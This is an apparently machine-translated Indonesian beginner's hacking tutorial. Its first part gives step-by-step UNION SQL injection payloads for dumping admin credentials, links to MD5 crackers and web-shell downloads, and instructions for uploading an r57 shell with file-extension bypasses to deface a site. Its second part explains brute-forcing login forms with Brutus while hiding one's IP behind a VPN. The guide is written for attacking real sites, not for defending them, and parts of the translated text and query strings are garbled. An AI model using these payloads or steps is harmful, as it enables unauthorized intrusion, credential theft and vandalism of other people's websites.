SQL Injection and Defacement For Beginners- Tutorial

1. Apa itu SQL Injection?

SQL Injection adalah teknik injeksi kode yang mengeksploitasi kerentanan keamanan yang terjadi pada lapisan aplikasi database. kerentanan ini hadir ketika masukan pengguna baik salah disaring untuk lolos karakter string literal tertanam dalam pernyataan SQL atau masukan pengguna tidak strongly typed dan dengan demikian tak terduga dieksekusi. Ini adalah sebuah instance dari kelas yang lebih umum dari kerentanan yang dapat terjadi kapan pun salah satu bahasa pemrograman atau scripting adalah tertanam dalam lainnya. serangan injeksi SQL juga dikenal sebagai serangan penyisipan SQL.

2. Apakah perusakan?

Sebuah perusakan situs merupakan serangan terhadap sebuah website yang mengubah tampilan visual situs. Ini biasanya kerja kerupuk sistem, yang masuk ke web server dan mengganti host website dengan salah satu dari mereka.

Apa yang Anda butuhkan sebelum Anda mulai dengan SQL Injection.

* Anda harus Admin Finder (untuk menemukan panel admin dari website) *
* Scanner * SQL Injection Rentan

Admin Finder:

http://www.mediafire.com/?0a4aw2gmeohndny

Rentan Scanner:

http://seanstar.000space.com/ &

20scanner% http://newbie.000space.com/sql / atau Anda dapat menggunakan Exploit Scanner.

Dorks untuk Menemukan situs Rentan!:

Common Dorks

inurl: members.php id =?
inurl: page.php id =?
inurl: login.php id =?
inurl: index.php id =?
inurl: register.php id =?
inurl: staff.php id =?
inurl: detail.php id =?
inurl: view.php id =?

MD5 Hash Crackers Online:

http://www.md5crack.com

http://www.md5decrypter.com

http://www.md5decrypter.co.uk

http://md5.rednoize.com

http://md5decryption.com

http://www.md5decrypter.com

http://passcracking.com

http://md5.my-addr.com/md5_decrypt-md5_c ... r_tool.php

http://www.xmd5.org

http://www.md5cracker.com/index.php

http://md5.noisette.ch/index.php

http://md5cracker.org

Teks untuk Converter ASCII:

http://www.mikezilla.com/exp0012.html?ascii=login&hex =% 2578 & unicode =% 26% 23120;

http://getyourwebsitehere.com/jswb/text_to_ascii.html

Shell:

http://www.kinginfet.net/shells/

Beberapa rentan website

Mulai Tutorial:

1. Pertama anda perlu untuk menemukan website yang rentan.

http://sql-vuln-site.com/index.php?id=15

2. Sekarang Anda perlu mencari kolom.

http://sql-vuln-site.com/index.php?id=15 order 1 - (tidak ada kesalahan)
http://sql-vuln-site.com/index.php?id=15 order 2 - (tidak ada kesalahan)
http://sql-vuln-site.com/index.php?id=15 order oleh 3 - (tidak ada kesalahan)
http://sql-vuln-site.com/index.php?id=15 order oleh 4 - (tidak ada kesalahan)
http://sql-vuln-site.com/index.php?id=15 order oleh 5 - (tidak ada kesalahan)
http://sql-vuln-site.com/index.php?id=15 order oleh 6 - (error)

Error terlihat seperti ini:

Anda memiliki kesalahan dalam sintaks SQL Anda, periksa manual yang sesuai dengan versi MySQL server anda untuk mengetahui sintaks yang hak untuk menggunakan dekat''39 'at line 1
query database kegagalan-SELECT * FROM texecom_sidemenu WHERE id = '39

3. Sekarang Pilih kolom

Kolom adalah 5

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT 1,2,3,4,5 -

4. Mencari versi.

Jadi jika Anda tidak berani pergi nomor 1, 2, 3, 4 salah satu dari mereka Anda akan mencoba semua.
Saya memilih 1

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT @ @ version, 2,3,4,5 -

Anda mendapat versi seperti ini:

5.0.32-Debian_7etch11-log

5. Menemukan Tabel

UNION ALL SELECT http://sql-vuln-site.com/index.php?id=15 nama_tabel, 2,3,4,5 dari information_schema.tables-

Dan anda akan mendapat tabel seperti ini:

PRODUK, ADMINS, dan lain-lain

Jadi harus ada tabel dengan nama: admin, pengguna, pengguna, login, klien.

6. Menemukan Kolom dalam Tabel ADMINS.

UNION ALL SELECT http://sql-vuln-site.com/index.php?id=15 nama_kolom, 2,3,4,5 dari information_schema.columns mana nama_tabel = char () -

Kami menemukan ADMINS tabel sekarang pergi ke ASCII web dan mengkonversi ADMINS

Anda akan punya ADMINS
Hapus & # dan ganti, untuk,
Seperti ini: 65,68,77,73,78,83

Anda menempatkan nama_tabel = char (65,68,77,73,78,83) -

UNION ALL SELECT http://sql-vuln-site.com/index.php?id=15 nama_kolom, 2,3,4,5 dari information_schema.columns mana nama_tabel = 65,68,77,73,78 char (, 83) -

Dan anda akan mendapat kolom dalam tabel ADMINS
Ada perlu memiliki kolom dengan nama: username dan password

7. Mendapatkan username dan password.

Sekarang kita menaruh concat (username, 0x3a, password) dan admin

UNION ALL SELECT http://sql-vuln-site.com/index.php?id=15 concat (username, 0x3a, password), 2,3,4,5 dari admin-

(0x3a adalah ASCII)

8. Finded username dan password

Jadi Anda menemukan username dan password
jika password hash seperti ini: 2510c39011c5be704182423e3a695e91
Anda akan perlu menggunakan MD5 Hash Online Crackers.
Jika password tidak hash anda beruntung dan sekarang Anda perlu mencari admin panel.

9. Menemukan Admin Panel

Buka alat Admin Finder
Menempatkan website di bawah dan klik Scan.

Jadi Anda menemukan panel admin dan kelihatannya http://sql-vuln-site.com/admin/login.php ini

Anda membuka website dan ada Username: Password:
Masukkan username dan password apa yang Anda punya.

Selesai Anda login di Admin Panel memungkinkan meng-upload shell dan merusak.

10. Meng-upload Shell dan Tambah Merusak

Di Admin Panel Anda akan mencari kategori atau apa pun di mana Anda dapat meng-upload file atau gambar.
Bila Anda ditemukan, Anda akan mendownload shell dari website yang saya memberi tahu Anda sebelum memulai tutorial sehingga Anda akan mencoba untuk meng-upload shell anda seperti: r57.php saat upload itu Anda akan melihat link upload dan buka seperti ini:

http://sql-vuln-site.com/upload/r57.php

Jika tidak dapat meng-upload r57.php mengubahnya ke r57.jpg.php atau r57.txt dan mencoba!

Anda perlu membuat halaman deface di html dan dimasukkan ke dalam website

Jadi anda membuka shell, Anda akan menemukan index.php file dan klik dan disana anda akan menghapus kode php dari indeks dan menaruh kode html Anda.

Selamat Anda deface website.

===================================================


How to Brute Force- Tutorial


Bagaimana Brute Force sebuah website yang berisi normal HTTP Login Form. Yang berarti mempunyai sebuah entri untuk username dan password. Kita akan melakukannya dengan menggunakan program yang disebut Brutus. Untuk melakukannya, Anda harus menemukan website yang 1) Berisi hanya field Nama pengguna dan Sandi, dan 2) Memungkinkan upaya terbatas pada menebak password tertentu. Untuk menguji jika website memungkinkan ini, coba password salah multipel untuk nama pengguna acak dan melihat apa respons yang Anda dapatkan setelah jumlah x upaya. Jika Anda tidak mendapatkan redirect halaman dan Anda tidak dibatasi jumlah usaha login, kemungkinan website ini rentan terhadap Brute Memaksa.

Sebelum kita mulai Anda mungkin bertanya-tanya apa yang Brute Memaksa, melainkan hanya menguji daftar sandi ke daftar nama pengguna dan mudah-mudahan Anda akan memiliki cocok kombinasi username dan password yang benar. Ada banyak kelemahan dalam menggunakan metode ini untuk hack, misalnya waktu (Anda perlu menguji ribuan jika tidak jutaan kombinasi) dan sebagian besar website kini memiliki fitur yang membatasi jumlah tebakan yang salah di password seseorang, atau membuat verifikasi lapangan manusia wajib ketika login Mari kita mulai.

Apa yang Akan Anda Butuh:

1) Download Brutus: http://www.hoobie.net/brutus/

2) Download Password Daftar: http://area51archives.com/index.php?title=Ultimate_Password_List

3) Anda akan memerlukan proxy atau VPN yang mengubah alamat IP Anda untuk semua program, tidak hanya web browser anda. Saya akan menyarankan menggunakan CyberGhost VPN atau Hot Spot Shield. Mereka cukup mudah digunakan dan didokumentasikan dengan baik jadi jika Anda memerlukan bantuan menggunakan mereka, silakan cari atau pergi ke situs Web mereka.

Persiapan:

Sebuah contoh membentuk Login sederhana adalah salah satu sebagai berikut (yang saya baru saja dibuat dalam HTML sebagai sarana untuk menunjukkan seperti itu) Saya tidak akan memberikan website nyata hanya untuk menghindari konflik apapun. Sekali Anda telah menemukan sebuah website yang terlihat mirip dengan itu, mengujinya beberapa kali untuk memastikan tidak membatasi berapa kali Anda mengetikkan password yang salah. Setelah memverifikasi bahwa mungkin rentan terhadap Brute Forcing, mari kita mulai.

formlogin 300x159 Bagaimana Brute Force Tutorial

Langkah Satu: Brutus mulai:

Brutus Bagaimana Brute Force Tutorial

Biarkan field target sendiri untuk saat ini dan di mana dikatakan memilih tipe HTTP (Formulir) Anda akan melihat bahwa di bawah sebuah opsi baru telah muncul yang disebut "Modifikasi Sequence." Tekan ini.

Langkah Kedua: Menetapkan Target Anda:

Temukan URL yang menghubungkan langsung ke halaman login website. Sebagai contoh: http://www.website.com/login; Masukkan bahwa URL ke dalam Field Target. Setelah melakukannya tekan belajar dari pengaturan. Anda sekarang akan melihat sesuatu mirip dengan layar berikut:

loginwm Bagaimana Brute Force Tutorial

Seperti yang Anda lihat, Di sisi kiri itu menyatakan "Nama Field" yang memberikan pilihan seperti username dan password. Pilih Username bawah daftar Nama Field dan tekan tombol yang mengatakan Username. Lakukan hal yang sama dengan password dan password memukul. Hal ini memungkinkan Brutus sekarang di mana untuk input daftar. Tekan menerima dan Anda akan kembali ke layar sebelumnya. Jika, ketika Anda sedang menguji Anda mendapat pesan yang mengatakan, "Salah login" atau sesuatu yang mirip, salin dan paste di bawah kotak Respon HTML. Tekan Oke saat lengkap Anda. Kita perlu melakukan satu hal lagi sebelum kita mulai.

Langkah Tiga: Pengaturan Firman daftar

Langkah berikutnya adalah cukup sederhana. Pergi ke opsi yang mengatakan "User File" dan pilih file teks yang berisi nama pengguna Anda ingin Brute Force. Di samping bawah "Pass File" menentukan daftar kata sandi Anda. Sebelum anda menekan Start pastikan semua variabel opsional ditetapkan untuk kepuasan Anda (default biasanya halus); mulai proxy Anda, pastikan alamat IP Anda dimask dari hit Mulai. Biarkan program untuk dijalankan selama yang Anda inginkan atau sampai telah selesai dan mudah-mudahan Anda mendapatkan beberapa password!